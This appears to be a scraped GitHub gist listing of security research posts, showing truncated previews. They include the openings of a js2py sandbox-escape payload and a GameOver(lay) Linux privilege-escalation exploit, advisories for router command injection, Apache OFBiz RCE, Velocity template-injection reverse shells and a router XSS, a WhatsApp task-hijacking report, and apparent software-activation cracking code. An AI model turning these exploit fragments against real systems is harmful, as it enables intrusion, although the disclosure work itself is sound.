import js2py
js_code = """
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
win3zz
/ CVE-2024-28397.md
Created
June 19, 2024 13:38
CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.
How to Use
Compare the performance of a stock across two or more time frames using the Yahoo Finance API and the Matplotlib Python library. Adjust the stock symbol and time frames according to your requirements and save the content in a file named script.py.
import requests
import matplotlib.pyplot as plt
from datetime import datetime
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Offline Activator [Version 1.0.0 Beta] | |
| * | |
| * @author Bipin Jitiya | |
| * @version 1.0 | |
| * @since 2024-04-24 | |
| */ | |
| import javax.crypto.Cipher; | |
| import javax.crypto.spec.SecretKeySpec; |
win3zz
/ CVE-2024-29269.md
Created
April 3, 2024 14:50
CVE-2024-29269: TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution
- CVE: CVE-2024-29269
- Severity: Critical
- Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)
File: script.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import javax.crypto.Cipher; | |
| import javax.crypto.SecretKeyFactory; | |
| import javax.crypto.spec.DESKeySpec; | |
| import java.security.Key; | |
| import java.security.MessageDigest; | |
| import java.math.BigInteger; | |
| public class GVHack { | |
| private static Key generateKey(String paramStr){ |
win3zz
/ CVE-2023-51467.md
Created
December 31, 2023 09:48
CVE-2023-51467: Apache OfBiz Auth Bypass and RCE
- CVE: CVE-2023-51467
- Severity: Critical (CVSS 9.8)
- Root cause: https://github.com/apache/ofbiz-framework/blob/0530a58d3a912520b7f9e46c5ccde98fd3737bf5/framework/webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy#L90
- Mitigation: Upgrade Apache OFBiz
- Reference: https://issues.apache.org/jira/browse/OFBIZ-12873
File: script.py
win3zz
/ VelocityReverseShell.md
Created
November 12, 2023 06:43
Velocity Template Language (VTL) - Remote Command Execution - Reverse Shell - SSTI - Testing
Download Dependencies
user@hostname:~$ mkdir velocity-engine
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-core-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-scripting-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/spring-velocity-support-2.3.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.13.0/commons-lang3-3.13.0.jar
user@hostname:~/velocity-engine$ cd ..
user@hostname:~$
win3zz
/ GameOver(lay).md
Last active
January 3, 2025 05:42
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
win3zz
/ CVE-2023-43260.md
Last active
November 6, 2023 18:33
Reflected Cross-Site Scripting (XSS) and Absent HttpOnly Flag in Ursalink Industrial Cellular Router Admin Panel Leads to Account Takeover
Cross-Site Scripting (XSS) and Absent HttpOnly Flag vulnerabilities in Ursalink Industrial Cellular Router admin panel could allow remote attackers to execute arbitrary scripts and hijack user sessions, potentially leading to account takeover.
The admin panel does not properly validate and sanitize user inputs, allowing malicious scripts to be injected into the page's content. The "td" session cookie lacks the HttpOnly flag (and also Secure Flag), enabling client-side scripts to access it, leading to session hijacking and unauthorized access. Attackers can steal sensitive information, impersonate users, or perform unauthorized actions.
- Affected Products: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Routers could also be vulnerable.
win3zz
/ Task-Hijacking-WhatsApp.md
Created
September 10, 2023 10:03
Task Hijacking Vulnerability in WhatsApp - Android
Around a year ago, I discovered a long-standing vulnerability in WhatsApp and other popular Android applications. Despite its existence for years, this vulnerability remained largely theoretical. To demonstrate its real-world impact, I successfully exploited it in WhatsApp, Facebook, and Facebook Lite. I promptly reported my findings to Facebook's Whitehat program. In this post, I'll share the details I provided to Facebook.
Don't want to read? Skip the technical details and watch the demo video here: https://youtu.be/1p3tehj3aUQ
While reviewing the WhatsApp Android application we have identified a misconfiguration in AndroidManifest.xml related to task control features. This misconfiguration leads to a critical vulnerability called task hijacking and enables the attack flow against the latest WhatsApp in Android-based phones.
In successful exploitation of the vulnerability, the malicious